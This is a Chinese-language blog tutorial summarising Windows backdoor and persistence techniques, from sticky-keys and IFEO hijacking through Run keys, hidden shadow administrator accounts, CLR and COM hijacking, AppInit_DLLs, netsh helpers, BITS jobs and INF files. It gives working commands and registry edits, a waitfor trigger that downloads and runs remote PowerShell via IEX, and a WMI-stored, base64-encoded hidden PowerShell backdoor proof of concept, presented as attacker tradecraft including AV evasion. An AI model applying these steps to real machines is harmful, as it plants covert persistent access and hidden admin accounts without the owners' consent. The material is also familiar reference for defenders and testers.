Windows后门总结
shift后门
这个是比较老的方式了,这里简单讲一下,在windows中有一些辅助功能,能在用户未登录系统之前可以通过组合键来启动它,类似的辅助功能有:
C:\Windows\System32\sethc.exe
粘滞键,启动快捷键:按五次shift键C:\Windows\System32\utilman.exe
设置中心,启动快捷键:Windows+U键
在低版本的windows中,我们可以直接把setch.exe
替换成我们的后门程序,下面我们把setch.exe
替换为cmd.exe
映像劫持
这个和shift后门差不多,只不过在低版本的windows中,我们可以简单地替换程序,但是在高版本的windows版本中替换的文件受到了系统的保护,所以这里我们要使用另外一个知识点:映像劫持。
"映像劫持",也被称为"IFEO"(Image File Execution Options)
就是Image File Execution Options(其实应该称为"image Hijack"。)是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和local system有权读写修改。
PS:来自百度百科
简单来说就是当目标程序被映像劫持时,当我们启动目标程序时,启动的是劫持后的程序而不是原来的程序
操作也很简单,在注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option
下添加一个项sethc.exe
,然后在sethc.exe
这个项中添加debugger
键,键值为我们恶意程序的路径,如下图
效果如下
注册表自启动项
MSF
的Persistence
模块利用的就是写注册表自启动项来实现的,一般自启动项是这两个键:Run
和RunOnce
,两者的区别如下
- Run:该项下的键值即为开机启动项,每一次随着开机而启动。
- RunOnce:RunOnce和Run差不多,唯一的区别就是RunOnce的键值只作用一次,执行完毕后就会自动删除
常见注册表启动项键的位置:
用户级
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
系统级
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
修改一下:
执行结果:
定时任务
windows下定时任务的命令有两个分别是:at
和schtasks
,他们两者主要区别是at
命令在win7
、08
等高版本的windows中是不能将任务在前台执行的,也就是只会打开一个后台进程,而schtasks
是将定时的任务在前台执行,下面我们逐个看看
at
的一些参数
AT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
at
的执行如下:
schtasks
一些参数:
schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]] /?
schtasks
的执行如下:
用户登陆初始化
Userinit
的作用是用户在进行登陆初始化设置时,WinLogon
进程会执行指定的login scripts
,所以我们可以修改它的键值来添加我们要执行的程序
注册表路径为:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
,我们添加一个我们启动的程序,多个程序用逗号隔开
效果如下:
Logon Scripts
Logon Scripts
优先于av先执行,我们可以利用这一点来绕过av的敏感操作拦截
注册表路径为:HKEY_CURRENT_USER\Environment
,创建一个键为:UserInitMprLogonScript
,其键值为我们要启动的程序路径
效果如下:
屏幕保护程序
在对方开启屏幕保护的情况下,我们可以修改屏保程序为我们的恶意程序从而达到后门持久化的目的
其中屏幕保护的配置存储在注册表中,其位置为:HKEY_CURRENT_USER\Control Panel\Desktop
,关键键值如下:
SCRNSAVE.EXE
- 默认屏幕保护程序,我们可以把这个键值改为我们的恶意程序ScreenSaveActive
- 1表示屏幕保护是启动状态,0表示表示屏幕保护是关闭状态ScreenSaverTimeout
- 指定屏幕保护程序启动前系统的空闲事件,单位为秒,默认为900(15分钟)
设置如下:
效果图:
自启动服务
自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将exe
文件注册为服务,也可以将dll
文件注册为服务
为了方便起见我们可以直接用Metasploit
来注册一个服务
meterpreter > run metsvc -A
运行之后msf会在%TMP%
目录下创建一个随机名称的文件夹,然后在该文件夹里面生成三个文件:metsvc.dll
、metsvc-server.exe
、metsvc.exe
同时会新建一个服务,其显示名称为Meterpreter
,服务名称为metsvc
,启动类型为"自动",默认绑定在31337端口。
如果想删除服务,可以执行
meterpreter > run metsvc -r
影子用户
影子用户顾名思义就是一个隐藏用户,只能通过注册表查看这个用户,其它方式是找不到这个用户的信息的
在用户名后面加一个$可以创建一个匿名用户,创建完毕后我们再把这个用户添加到administrator组
net user test$ test /add
net localgroup administrators test$ /add
可以看到net user是看不到我们创建的用户,但是计算机管理-用户和组中可以看到
所以这时候我们就需要修改一下注册表,其键位置为:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
注意:SAM键值默认是只能system权限修改的,所以我们要修改一下SAM键的权限,给予administrator完全控制和读取的权限
然后我们将administrator用户对应的项中的F值复制到test$对应xiang中的F值,然后保存
然后我们将test$删除掉
net user test$ /del
然后再双击导出的注册表文件,然后我们再看一下
net user和计算机管理-用户和组中都查看不到用户了,但是我们可以用net user test$
查看用户信息
这个时候我们再用net user test$ /del
是删除不掉这个用户的,只能通过注册表来删除。
waitfor
关于waitfor
手册中是这么解释的:
在系统上发送或等待信号。waitfor可用于跨网络同步计算机。
waitfor
的语法
waitfor [/s <Computer> [/u [<Domain>\]<User> [/p [<Password>]]]] /si <SignalName>
waitfor [/t <Timeout>] <SignalName>
参数解释:
/s <Computer> 指定远程计算机的名称或IP地址,默认为本地计算机
/u [<Domain>]<user> 使用指定用户帐户的凭据运行脚本。默认是使用当前用户的凭据。
/p <Password> 指定/u参数中指定的用户帐户的密码。
/si 发送指定激活信号。
/t 指定等待信号的秒数。默认为无限期等待。
<SignalName> 指定等待或发送的信号,不区分大小写,长度不能超过225个字符
关于waitfor
更多的信息可以看一下微软提供的手册:链接
我们来测试一下看看
waitfor test && calc 表示接收信号成功后执行计算器
waitfor /s 192.168.163.143 /u qiyou /p qiyou /si test
结果如下
但是这样只能执行一次,这对我们后门持久化很不利,所以我们得想办法让它持久化。
这里就要借用一下三好师傅的powershell
脚本
支持系统:
- Windows Server 2003
- Windows Vista
- Windows XP
- Windows Server 2008
- Windows 7
- Windows Server 2003 with SP2
- Windows Server 2003 R2
- Windows Server 2008 R2
- Windows Server 2000
- Windows Server 2012
- Windows Server 2003 with SP1
- Windows 8
- Windows 10
- 其他Server系统未测试,理论上支持
利用思路
Daniel Bohannon @danielhbohannon在twitter上分享了他的利用思路:将waitfor接收信号后的操作设置为从远程服务器下载powershell代码并执行
地址如下:
https://twitter.com/danielhbohannon/status/872258924078092288
细节如下图
此外,他还提到了一个有趣的技巧:如果将powershell代码设置为延期执行,那么接收信号后,后台将不存在进程waitfor.exe
我验证了这个结论,方法如下:
开启等待模式:
cmd:
waitfor test1 && && powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3gstudent/test/master/calc2.ps1')
发送信号:
cmd:
waitfor /s 127.0.0.1 /si test1
https://raw.githubusercontent.com/3gstudent/test/master/calc2.ps1的内容如下:
Start-Sleep -Seconds 10;
start-process calc.exe;
当成功接收信号后,进程waitfor.exe退出
接着执行powershell脚本,等待10秒再启动calc.exe
这10秒内,只存在进程powershell.exe
也就是说,如果把等待时间设置更长,那么再这一段等待时间内不存在进程waitfor.exe,提醒防御者注意这个细节
poc细节
如果作为一个后门,那么上面的利用方法还不够成熟
因为触发一次后,进程waitfor.exe将退出,导致该后门无法重复使用
需要再次开启一个等待模式,才能再次触发后门
当然,可以在每次后门触发后手动开启一个等待模式
但这不够智能,能否通过脚本实现自动开启等待模式,使其成为一个可持续触发的后门呢?
为此,我写了以下POC
思路1:
在目标系统保存一个ps脚本1.ps1
1.ps1内容如下:
start-process calc.exe
cmd /c waitfor persist `&`& powershell -executionpolicy bypass -file c:\test\1.ps1
注:
转义字符&在powershell中要用`&表示
开启等待模式:
cmd:
waitfor persist1 && powershell -executionpolicy bypass -file c:\test\1.ps1
发送信号:
cmd:
waitfor /s 127.0.0.1 /si persist1
思路2:
不在目标系统保存文件
这里使用一个之前在《WMI backdoor》中介绍过的技巧,将payload保存在WMI类中,进行读取使用
存储payload:
(管理员权限)
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Backdoor'
$StaticClass.Put()
$StaticClass.Properties.Add('Code' , "cmd /c start calc.exe")
$StaticClass.Put()
读取payload:
([WmiClass] 'Win32_Backdoor').Properties['Code'].Value
以上操作如下图
执行payload:
$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;
iex $exec
注:
通过Invoke-Expression执行命令也可以,使用iex是为了缩短长度
结合waitfor的参数格式,这里选择将代码编码为base64
对执行payload的代码进行base64编码,以下代码保存在code.txt:
$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;
iex $exec
对其进行base64编码,代码如下:
$code = Get-Content -Path code.txt
$bytes = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded
获得base64加密代码如下:
JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==
以上操作如下图
测试base64加密代码:
powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==
成功执行代码,如下图
根据以上思路,POC如下:
后门代码:
(管理员权限)
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Backdoor'
$StaticClass.Put()
$StaticClass.Properties.Add('Code' , "cmd /c start calc.exe ```&```& waitfor persist ```&```& powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==")
$StaticClass.Put()
注:
存在两次转义字符
``用来表示`
安装代码:
$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;
iex $exec
激活命令:
waitfor /s 127.0.0.1 /si persist
实际测试如下图
存在bug,导致powershell.exe无法正常退出,进程在后台残留
所以需要添加一段代码,用来结束进程powershell.exe
注:
根据逻辑关系,结束powershell.exe的代码要写在powershell -nop -W Hidden -E ...
之前
最终,完整POC代码如下:
后门代码:
(管理员权限)
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Backdoor'
$StaticClass.Put()| Out-Null
$StaticClass.Properties.Add('Code' , "cmd /c start calc.exe ```&```& taskkill /f /im powershell.exe ```&```& waitfor persist ```&```& powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==")
$StaticClass.Put() | Out-Null
$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;
iex $exec | Out-Null
激活命令:
waitfor /s 127.0.0.1 /si persist
完整演示如下图
该方法的优点就是能主动激活,但是缺点也明显就是只能在同一网段才能接收和发送激活信号、服务器重启之后就不行了。
CLR
CLR的简述(来自百度百科)
CLR(公共语言运行库,Common Language Runtime)和Java虚拟机一样也是一个运行时环境,是一个可由多种编程语言使用的运行环境。CLR的核心功能包括:内存管理、程序集加载、安全性、异常处理和线程同步,可由面向CLR的所有语言使用。并保证应用和底层操作系统之间必要的分离。CLR是.NET Framework的主要执行引擎。
需要注意的是CLR
能够劫持系统中全部.net
程序,而且系统默认会调用.net
程序,从而导致我们的后门自动触发,这是我们后门持久化的一个好的思路,下面来实现一下
修改一下注册表,注册表路径:HKEY_CURRENT_USER\Software\Classes\CLSID\
,新建子项{11111111-1111-1111-1111-111111111111}
(名字随便,只要不与注册表中存在的名称冲突就行),然后再新建子项InProcServer32
,新建一个键ThreadingModel
,键值为:Apartment
,默认的键值为我们dll
的路径
然后在cmd下设置一下:
PS:要注册为全局变量,不然只能在当前cmd窗口劫持.net程序
SETX COR_ENABLE_PROFILING= 1 /M
SETX COR_PROFILER= {11111111-1111-1111-1111-111111111111} /M
然后执行一波,效果如下,可以看到已经成功劫持了
Hijack CAccPropServicesClass and MMDeviceEnumerator
什么是COM
(来自WIKI
)
组件对象模型(英语:Component Object Model,缩写COM)是微软的一套软件组件的二进制接口标准。这使得跨编程语言的进程间通信、动态对象创建成为可能。COM是多项微软技术与框架的基础,包括OLE、OLE自动化、ActiveX、COM+、DCOM、Windows shell、DirectX、Windows Runtime。
这个和CRL
劫持.NET
程序类似,也是通过修改CLSID
下的注册表键值,实现对CAccPropServicesClass
和MMDeviceEnumerator
的劫持,而系统很多正常程序启动时需要调用这两个实例,所以这个很适合我们的后门持久化。
经测试貌似64位系统下不行(或许是我姿势的问题),但是32位系统下可以,下面说一下32位系统利用方法:
在%APPDATA%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\
下放入我们的后门dll
,重命名为test._dl
PS:如果Installer
文件夹不存在,则依次创建Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
然后就是修改注册表了,在注册表位置为:HKCU\Software\Classes\CLSID\
下创建项{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
,然后再创建一个子项InprocServer32
,默认为我们的dll
文件路径:C:\Users\qiyou\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
,再创建一个键ThreadingModel
,其键值为:Apartment
然后就是测试了,打开iexplore.exe
,成功弹框
PS:{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
对应CAccPropServicesClass
,{BCDE0395-E52F-467C-8E3D-C4579291692E}
对应MMDeviceEnumerator
劫持MruPidlList
在注册表位置为HKCU\Software\Classes\CLSID\
下创建项{42aedc87-2188-41fd-b9a3-0c966feabec1}
,再创建一个子项InprocServer32
,默认的键值为我们的dll路径,再创建一个键ThreadingModel
,其键值:Apartment
该注册表对应COM
对象MruPidlList
,作用于shell32.dll
,而shell32.dll
是Windows的32位外壳动态链接库文件,用于打开网页和文件,建立文件时的默认文件名的设置等大量功能。其中explorer.exe
会调用shell32.dll
,然后会加载COM对象MruPidlList
,从而触发我们的dll
文件
当用户重启时或者重新创建一个explorer.exe
进程时,就会加载我们的恶意dll文件,从而达到后门持久化的效果。这里我们直接结束一个explorer.exe
进程再起一个进程来看一下效果
文件关联
什么是文件关联
文件关联就是将一种类型的文件与一个可以打开它的程序建立起一种依存关系。一个文件可以与多个应用程序发生关联。可以利用文件的“打开方式”进行关联选择。
举个例子来说,位图文件(BMP文件)在Windows中的默认关联程序是“图片”,如果将其默认关联改为用ACDSee程序来打开,那么ACDSee就成了它的默认关联程序。
PS:来自百度百科
我们可以用assoc
命令显示或修改文件扩展名关联,我们可以看一下.txt
文件的关联
我们可以用ftype
命令显示或修改用在文件扩展名关联中的文件类型
相关注册表
HKEY_CURRENT_USER\Software\Classe //保存了当前用户的类注册和文件扩展名信息
HKEY_LOCAL_MACHINE\Software\Classe //保存了系统所有用户用户的类注册和文件扩展名信息
HKEY_CLASS_ROOT //HKEY_CLASSES_ROOT项提供合并来自上面两个的信息的注册表的视图
我们以.txt
为例,通过文件关联来修改它默认打开的程序。
修改\HKEY_CLASS_ROOT\txtfile\shell\open\command
的默认值为我们要执行的程序
效果如下:
AppInit_DLLs
User32.dll
被加载到进程时,会读取AppInit_DLLs
注册表项,如果有值,调用LoadLibrary() api
加载用户dll。
其注册表位置为:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
,把AppInit_DLLs
的键值设置为我们dll路径,将LoadAppInit_DLLs
设置为1
效果如下:
Netsh helper
netsh
(全称:Network Shell
) 是windows
系统本身提供的功能强大的网络配置命令行工具,它可以添加自定的dll从而拓展其功能,我们可以使用netsh add helper yourdll.dll
来添加拓展功能,添加了之后,在启动netsh
的时候就会加载我们dll文件
添加自定义helper dll
关于helper dll
的编写可以参考这个项目:链接
我们可以使用两种方式来添加helper:
通过cmd添加helper
netsh add helper test.dll
- 通过注册表添加helper
其位置为:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh
,创建一个键,名称随便,键值为我们dll的路径
效果如下:
利用BITS
BITS
(后台智能传送服务) 是一个 Windows 组件,它可以在前台或后台异步传输文件,为保证其他网络应用程序获得响应而调整传输速度,并在重新启动计算机或重新建立网络连接之后自动恢复文件传输。
bitsadmin
是一个命令行工具,用于创建下载或上传任务并监视其进度。你可以执行bitsadmin /?
或bitsadmin /HELP
获取帮助列表。
常见的bitsadmin
命令
bitsadmin /create [type] DisplayName //创建一个任务
bitsadmin /cancel <Job> //删除一个任务
bitsadmin /list /allusers /verbose //列出所有任务
bitsadmin /AddFile <Job> <RemoteURL> <LocalName> //给任务test添加一个下载文件
bitsadmin /SetNotifyCmdLine <Job> <ProgramName> [ProgramParameters] //设置在任务完成传输时或任务进入状态时将运行的命令行命令。
bitsadmin /Resume <Job> //激活传输队列中的新任务或挂起的任务。
bitsadmin /cancel <Job> //删除某个任务
bitsadmin /reset /allusers //删除所有任务
bitsadmin /complete <Job> //完成某个任务
下面我们来测试一下:
bitsadmin /create test
bitsadmin /addfile test c:\windows\system32\calc.exe c:\Users\qiyou\Desktop\calc.exe //为了方便起见我们直接复制本地文件
bitsadmin /SetNotifyCmdLine test cmd.exe "cmd.exe /c calc.exe"
bitsadmin /resume test
效果如下:
重启电脑之后任务还是存在
重启电脑之后任务会再一次被激活,大概几分钟之后我们的命令会再次执行(由于时间太长了就不录制gif了)
如果我们想让任务完成,可以执行bitsadmin /complete test
,calc.exe
也会复制到桌面上
利用inf文件实现后门
inf
文件
INF文件或安装信息文件是Microsoft Windows用于安装软件和驱动程序的纯文本文件。INF文件最常用于安装硬件组件的设备驱动程序。Windows包含用于创建基于INF的安装的IExpress工具。INF文件是Windows安装程序API及其后续版本Windows Installer的一部分。
PS:来自WIKI
inf`文件的结构
想了解更多可以看一下微软的手册:`https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc939869(v=technet.10)#information-inf-file-entries
- DefaultInstall节(来自WIKI)
INF文件的结构与INI文件的结构非常类似; 它包含用于指定要复制的文件,对注册表的更改等的各个部分。所有INF文件都包含一个[Version]带有Signature 键值对的部分,用于指定INF文件所针对的Windows版本。签名通常是$CHICAGO$(对于Windows 9x)或$WINDOWS NT$(对于Windows NT / 2K / XP)。其余大多数部分是用户定义的,并且包含特定于要安装的组件的信息。- DefaultInstall节(来自微软的手册)
RunPreSetupCommands-本节中指定的命令在安装服务配置文件之前运行。
RunPostSetupCommands-本节中指定的命令在安装程序完成服务配置文件后运行。
RunPreUnInstCommands-本节中指定的命令在卸载程序开始之前运行。
RunPostUnInstCommands-本节中指定的命令在卸载程序运行后运行。
下面举一个calc.inf
弹计算器的例子
[Version]
Signature="$CHICAGO$"
AdvancedINF=2.5,"test"
[DefaultInstall]
RunPreSetupCommands=Command1
[Command1]
C:\windows\system32\calc.exe
命令行下执行:
rundll32.exe advpack.dll,LaunchINFSection calc.inf,DefaultInstall
效果如下:
后门实现:
在注册表HKEY_CURRENT_USER\Software\Microsoft\
处依次新建子项\IEAK\GroupPolicy\PendingGPOs
,然后再新建几个键,如下:
- 键:
Count
,类型:REG_DWORD
,键值:1
- 键:
Path1
,类型:REG_SZ
,键值:C:\Users\Administrator\Desktop\test\calc.inf
//这个为我们inf文件的路径,这里以上面那个inf文件例子为例 - 键:
Section1
,类型:REG_SZ
,键值:DefaultInstall
如下图所示:
重启电脑之后成功弹出计算器
但是重启之后PendingGPOs
该项就会被清除,需要我们重新修改注册表
0 条评论